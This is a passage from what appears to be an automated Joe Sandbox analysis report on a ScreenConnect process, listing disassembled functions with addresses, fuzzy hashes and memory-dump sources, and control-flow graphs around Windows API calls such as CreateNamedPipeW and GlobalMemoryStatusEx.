                                                                                                                                          Function 00007FF9CC6C14EF Relevance: .1, Instructions: 107COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cdf20e2a94b79872d719d02a6278d290b019203e2c9dfd88d48cbf91bc094d31
                                                                                                                                          • Instruction ID: 31ad954d81685e56e0416d238ac936fbc54efb0f2db968633d5edc72a4741f89
                                                                                                                                          • Opcode Fuzzy Hash: cdf20e2a94b79872d719d02a6278d290b019203e2c9dfd88d48cbf91bc094d31
                                                                                                                                          • Instruction Fuzzy Hash: F831D536E0E6971FD706FB2CE9A64D93F50DF42228B0C00B3D4D9DA0A3EA1634498A91
                                                                                                                                          Function 00007FF9CC6C574D Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b6517bb6555feba82aba4c41d960f4b710762463ca99494e04d2ad76b179304
                                                                                                                                          • Instruction ID: f85cd63a367def687ff1c43dd18ac20540ba37b973d04963f1e79fee9c699e20
                                                                                                                                          • Opcode Fuzzy Hash: 1b6517bb6555feba82aba4c41d960f4b710762463ca99494e04d2ad76b179304
                                                                                                                                          • Instruction Fuzzy Hash: AC11E476D0CA8B8FEF82DF695D642A97FA0FF59300F0400ADD0C9D7192DA61A4418B01
                                                                                                                                          Function 00007FF9CC6C2B00 Relevance: .1, Instructions: 68COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cfaaa04e73e42d46f84e260eb81bd4d1bcd580b27c7e84f9d45da8779a63dadf
                                                                                                                                          • Instruction ID: f762e38963a4cf213c92c9e7775ebfb1ca0a4c7f2c5dd4061ccc26dae603b7f7
                                                                                                                                          • Opcode Fuzzy Hash: cfaaa04e73e42d46f84e260eb81bd4d1bcd580b27c7e84f9d45da8779a63dadf
                                                                                                                                          • Instruction Fuzzy Hash: AC11A271B08A8B8FDB89DF18C554A6577D1FFA8705B14007DD44ED7282CE25F802CB40
                                                                                                                                          Function 00007FF9CC6C2D4C Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c71203dc4c7e81e65830c2f863b709fcd7f8a5590bdbbd5517ca608fcb598f2
                                                                                                                                          • Instruction ID: fe8300d3cd1262b668e8797fca5f67b914f158209135d955c07b703813876734
                                                                                                                                          • Opcode Fuzzy Hash: 8c71203dc4c7e81e65830c2f863b709fcd7f8a5590bdbbd5517ca608fcb598f2
                                                                                                                                          • Instruction Fuzzy Hash: C8116031E189874FDB89DF18C551B657BA1FF68300B0441B8C88EDB287CE69F8068B80
                                                                                                                                          Function 00007FF9CC6C4839 Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e40855802dd96e1635fdf82891de442b2f58159f1a70af160312cfb4df6ce2b5
                                                                                                                                          • Instruction ID: 5c3d746d86a72200c5e6aee474e3d8f2a9852c8573ed3c482bfeca8caa6e7bc3
                                                                                                                                          • Opcode Fuzzy Hash: e40855802dd96e1635fdf82891de442b2f58159f1a70af160312cfb4df6ce2b5
                                                                                                                                          • Instruction Fuzzy Hash: 4711C411D0DBC30EF766D72886A03746AE19F81341F1941BAC489C65D6DD9EAC818B41
                                                                                                                                          Function 00007FF9CC6C2DB5 Relevance: .1, Instructions: 59COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84920c8909ad72a5274414a5006f176990483f12d14625605a6279fa4dcc2b0c
                                                                                                                                          • Instruction ID: 293852ccd0c0f8c15e640d007e34a50b8030642bc16a5f62c424ea19517aa67d
                                                                                                                                          • Opcode Fuzzy Hash: 84920c8909ad72a5274414a5006f176990483f12d14625605a6279fa4dcc2b0c
                                                                                                                                          • Instruction Fuzzy Hash: F9114271A189874FDB89DF18C555B557BA1FF68704B0441BCC48EDB287CE79F8068B80
                                                                                                                                          Function 00007FF9CC6C9679 Relevance: .1, Instructions: 52COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18716263a803e76fbf31a8c64b332b33e46f331af8b8ad038cd62eec1987dd50
                                                                                                                                          • Instruction ID: 50fdfc7a7e26f3491180cee1d20aca8837d9cbbf7b043fd04dbdb202d45b6eb2
                                                                                                                                          • Opcode Fuzzy Hash: 18716263a803e76fbf31a8c64b332b33e46f331af8b8ad038cd62eec1987dd50
                                                                                                                                          • Instruction Fuzzy Hash: 3701FC31A0EACA0FD796DF6D6C991B03FE1EF9B21630901E7E4C9C7293D9569C418341
                                                                                                                                          Function 00007FF9CC6C3FC9 Relevance: .0, Instructions: 32COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0ea8e0ceb00c6c6fa7b9d2f732dc06799dee43fab11657fdea5dd7541f829457
                                                                                                                                          • Instruction ID: 90790a4d6f824dbbd330287fde3e3b2a0346783d6fba3c0eb5fdbd8055c1fbab
                                                                                                                                          • Opcode Fuzzy Hash: 0ea8e0ceb00c6c6fa7b9d2f732dc06799dee43fab11657fdea5dd7541f829457
                                                                                                                                          • Instruction Fuzzy Hash: F6F08C3180D6889FCB42DF68D4558D5BF70EE06320B0501C7E089CB462E6219A58CB82
                                                                                                                                          Function 00007FF9CC6C0AE1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 65b8d75488b989e7c3d0a78b398c4d5c0544c9f8cfa60a5f2b5cec74ef91c1c6
                                                                                                                                          • Instruction ID: 0215d7939ef029e3d1d30e6a0eccfee36943486d0cda20fa823feb49343e0653
                                                                                                                                          • Opcode Fuzzy Hash: 65b8d75488b989e7c3d0a78b398c4d5c0544c9f8cfa60a5f2b5cec74ef91c1c6
                                                                                                                                          • Instruction Fuzzy Hash: 46E0DF6150F7D54FDB53DB7888A88E03FA0EE1722030901EBD4C1CF0B3E5198A89CB92
                                                                                                                                          Function 00007FF9CC6C4850 Relevance: .0, Instructions: 24COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 661f9896a2f128227adf3d0c6e276f88bda83be93cd723ce8b87b2f23cad71c3
                                                                                                                                          • Instruction ID: 69cf8ee4204a5bcb522e8d83a6fc2e7543bd645b19b46892007802ac317c82c4
                                                                                                                                          • Opcode Fuzzy Hash: 661f9896a2f128227adf3d0c6e276f88bda83be93cd723ce8b87b2f23cad71c3
                                                                                                                                          • Instruction Fuzzy Hash: 67E0C225E0E68302FB6DEA357AE13B968D59F05312F0981BAE40EC08C5DDADEC808991
                                                                                                                                          Function 00007FF9CC6C8343 Relevance: .0, Instructions: 18COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 378e885403bf41ceec44de977a44c209caf6163a43d74d5c6f65d2338a41ab80
                                                                                                                                          • Instruction ID: b9cd962b0b487899a84524c3d7372f07a1dd828dd3ea2d30e353a65dee3c9c83
                                                                                                                                          • Opcode Fuzzy Hash: 378e885403bf41ceec44de977a44c209caf6163a43d74d5c6f65d2338a41ab80
                                                                                                                                          • Instruction Fuzzy Hash: 34D0C912F9C89B0BA9D9EE4D75822A416C2D7D869178410A5E54DC2249DC49BC830B80
                                                                                                                                          Function 00007FF9CC6C2E54 Relevance: .0, Instructions: 8COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d60a0b02d71db1a5b49541be4f305b8d04ae9723bce60791be8b8def1bdcf0c7
                                                                                                                                          • Instruction ID: c6ebe8fb70c3ee34fc8671c8c24f7950f72b2ee7e3baf8fbc57d0c0d3138ffbd
                                                                                                                                          • Opcode Fuzzy Hash: d60a0b02d71db1a5b49541be4f305b8d04ae9723bce60791be8b8def1bdcf0c7
                                                                                                                                          • Instruction Fuzzy Hash: FAC09B10F195C746F545EF24555177D15526F88601F504435F44DC11C7CD7CF5015D45

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:16
                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                          execution_graph 15363 7ff9cc3c8014 15365 7ff9cc3c801d 15363->15365 15364 7ff9cc3c8001 15365->15364 15366 7ff9cc3c80f6 SetProcessMitigationPolicy 15365->15366 15367 7ff9cc3c8152 15366->15367 15354 7ff9cc3c3642 15355 7ff9cc3e64e0 CreateNamedPipeW 15354->15355 15357 7ff9cc3e6613 15355->15357 15368 7ff9cc3c3662 15369 7ff9cc3e6a80 ConnectNamedPipe 15368->15369 15371 7ff9cc3e6b32 15369->15371 15358 7ff9cc6d9114 15359 7ff9cc6d911d 15358->15359 15360 7ff9cc6d92d0 GlobalMemoryStatusEx 15359->15360 15362 7ff9cc6d9212 15359->15362 15361 7ff9cc6d92e5 15360->15361

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FF9CC6D9114 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 473 7ff9cc6d9114-7ff9cc6d911b 474 7ff9cc6d9126-7ff9cc6d9179 473->474 475 7ff9cc6d911d-7ff9cc6d9125 473->475 478 7ff9cc6d91f0-7ff9cc6d91f1 474->478 479 7ff9cc6d917b-7ff9cc6d918a 474->479 475->474 480 7ff9cc6d91f2 478->480 481 7ff9cc6d926d 478->481 485 7ff9cc6d91d4-7ff9cc6d91e6 479->485 486 7ff9cc6d918c-7ff9cc6d91b5 479->486 483 7ff9cc6d9263-7ff9cc6d926c 480->483 484 7ff9cc6d91f3-7ff9cc6d91f7 480->484 487 7ff9cc6d926e-7ff9cc6d926f 481->487 483->481 488 7ff9cc6d9273-7ff9cc6d9278 484->488 489 7ff9cc6d91f9 484->489 500 7ff9cc6d91e8-7ff9cc6d91ed 485->500 501 7ff9cc6d9262 485->501 490 7ff9cc6d91b7-7ff9cc6d91ba 486->490 491 7ff9cc6d920e 486->491 492 7ff9cc6d9270-7ff9cc6d9271 487->492 493 7ff9cc6d92b9-7ff9cc6d92cf 487->493 498 7ff9cc6d9279-7ff9cc6d927e 488->498 495 7ff9cc6d923b-7ff9cc6d923f 489->495 496 7ff9cc6d91fb-7ff9cc6d91fd 489->496 490->495 497 7ff9cc6d91bc-7ff9cc6d91be 490->497 499 7ff9cc6d920f 491->499 492->488 502 7ff9cc6d92d0-7ff9cc6d92e3 GlobalMemoryStatusEx 493->502 518 7ff9cc6d9240 495->518 496->498 505 7ff9cc6d91ff-7ff9cc6d9201 496->505 506 7ff9cc6d91c0 497->506 507 7ff9cc6d923a 497->507 508 7ff9cc6d927f-7ff9cc6d9283 498->508 509 7ff9cc6d9210 499->509 510 7ff9cc6d928b-7ff9cc6d928e 499->510 500->487 511 7ff9cc6d91ef 500->511 501->483 503 7ff9cc6d92e5 502->503 504 7ff9cc6d92eb-7ff9cc6d9312 502->504 503->504 513 7ff9cc6d9203 505->513 506->513 514 7ff9cc6d91c2-7ff9cc6d91c4 506->514 507->495 515 7ff9cc6d9285-7ff9cc6d928a 508->515 516 7ff9cc6d9291-7ff9cc6d92b7 509->516 517 7ff9cc6d9211 509->517 510->516 511->478 513->508 519 7ff9cc6d9205 513->519 514->518 520 7ff9cc6d91c6 514->520 515->510 516->493 522 7ff9cc6d9212-7ff9cc6d9239 517->522 523 7ff9cc6d9253-7ff9cc6d9259 517->523 524 7ff9cc6d9206-7ff9cc6d9207 519->524 525 7ff9cc6d9247-7ff9cc6d9249 519->525 526 7ff9cc6d91c8-7ff9cc6d91ca 520->526 527 7ff9cc6d9209 520->527 522->507 523->502 528 7ff9cc6d925b-7ff9cc6d925f 523->528 524->527 533 7ff9cc6d924f 525->533 534 7ff9cc6d924b-7ff9cc6d924e 525->534 531 7ff9cc6d9246 526->531 532 7ff9cc6d91cc 526->532 527->515 535 7ff9cc6d920b-7ff9cc6d920d 527->535 528->501 531->525 532->499 536 7ff9cc6d91ce-7ff9cc6d91d1 532->536 537 7ff9cc6d9252 533->537 538 7ff9cc6d9250-7ff9cc6d9251 533->538 534->533 535->491 536->538 539 7ff9cc6d91d3 536->539 537->523 538->537 539->485
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.1183261422.00007FF9CC6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6D0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff9cc6d0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1890195054-0
                                                                                                                                          • Opcode ID: 773f7c370e29bc9cc310128ac77e6faee37dd6e035a9bd6bd7d248ba741a674d
                                                                                                                                          • Instruction ID: a5f0778e90d145999c9f87dc1e69485807afe9eba64c94a022d1f42d8f732815
                                                                                                                                          • Opcode Fuzzy Hash: 773f7c370e29bc9cc310128ac77e6faee37dd6e035a9bd6bd7d248ba741a674d
                                                                                                                                          • Instruction Fuzzy Hash: D481D331D0D6CB4FF766CA688A157A97FE0FF56320F0441BAD08EC7592DE98680A8B41
                                                                                                                                          Function 00007FF9CC3C8014 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                          • Opcode ID: c99db4f488f5d5cfb2cb338f0e00abf5b0070f8eb995c5f3596520eae2b64e57
                                                                                                                                          • Instruction ID: 2b9aabbee0cc1c5be32ee5f51966c53ddeedbfd8688c745e4658b35eb5b14f75
                                                                                                                                          • Opcode Fuzzy Hash: c99db4f488f5d5cfb2cb338f0e00abf5b0070f8eb995c5f3596520eae2b64e57
                                                                                                                                          • Instruction Fuzzy Hash: 5C511631D1C7994FDB18AFA8A8465F97BE0EF56321F04027FE489C3152DA64B8468B92
                                                                                                                                          Function 00007FF9CC3C3642 Relevance: 1.7, APIs: 1, Instructions: 172pipeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 561 7ff9cc3c3642-7ff9cc3e654a 564 7ff9cc3e6554-7ff9cc3e6611 CreateNamedPipeW 561->564 565 7ff9cc3e654c-7ff9cc3e6551 561->565 567 7ff9cc3e6613 564->567 568 7ff9cc3e6619-7ff9cc3e664c 564->568 565->564 567->568
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2489174969-0
                                                                                                                                          • Opcode ID: 779f5dfaffc52fd1557ad29f0560dcf1108283d8ecad60161bf4e46dbbff86ac
                                                                                                                                          • Instruction ID: 4968349ceb4da80fc3f2163c62f9d7f53813bc020cf559ce2bfc07b855c63f1b
                                                                                                                                          • Opcode Fuzzy Hash: 779f5dfaffc52fd1557ad29f0560dcf1108283d8ecad60161bf4e46dbbff86ac
                                                                                                                                          • Instruction Fuzzy Hash: DB518071918A5C8FDB68DF5C9845BE9BBE0FB59710F0442AEE04DE3251CB70A8458BC1
                                                                                                                                          Function 00007FF9CC3C3662 Relevance: 1.6, APIs: 1, Instructions: 121pipeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 630 7ff9cc3c3662-7ff9cc3e6b30 ConnectNamedPipe 634 7ff9cc3e6b38-7ff9cc3e6b80 call 7ff9cc3e6b81 630->634 635 7ff9cc3e6b32 630->635 635->634
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2191148154-0
                                                                                                                                          • Opcode ID: 5783de51c4a8784802bcb6eb297774a572ce5f4de26d7abb527f992830f6a86b
                                                                                                                                          • Instruction ID: 28dda5a4b74c0eef8dc487b5c4e97a7039149b27d2c7cb48a8cdb5ab73d420f0
                                                                                                                                          • Opcode Fuzzy Hash: 5783de51c4a8784802bcb6eb297774a572ce5f4de26d7abb527f992830f6a86b
                                                                                                                                          • Instruction Fuzzy Hash: 47318D70E08A1D8FDB58EF98D849BEDB7F0FBA9311F00826AD04DD7255DB70A8458B81
                                                                                                                                          Function 00007FF9CC3C3AA2 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 639 7ff9cc3c3aa2-7ff9cc3c80ef 641 7ff9cc3c80f6-7ff9cc3c8150 SetProcessMitigationPolicy 639->641 642 7ff9cc3c8158-7ff9cc3c8187 641->642 643 7ff9cc3c8152 641->643 643->642
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                          • Opcode ID: 7c6a2cee19b8e8ace549b9bd8ea63e6d7efa8bbb72d17c3b1e0fb1e20e534ee8
                                                                                                                                          • Instruction ID: 885f63ccd03a99bc2a7d542e4ef6f8e4c8c315d7c5bbe3f1fbd512214b8c1b70
                                                                                                                                          • Opcode Fuzzy Hash: 7c6a2cee19b8e8ace549b9bd8ea63e6d7efa8bbb72d17c3b1e0fb1e20e534ee8
                                                                                                                                          • Instruction Fuzzy Hash: 1821A731918B188FDB18AF9D9C4AAF97BE0EB55711F00422EE449D3251DB74B8458B92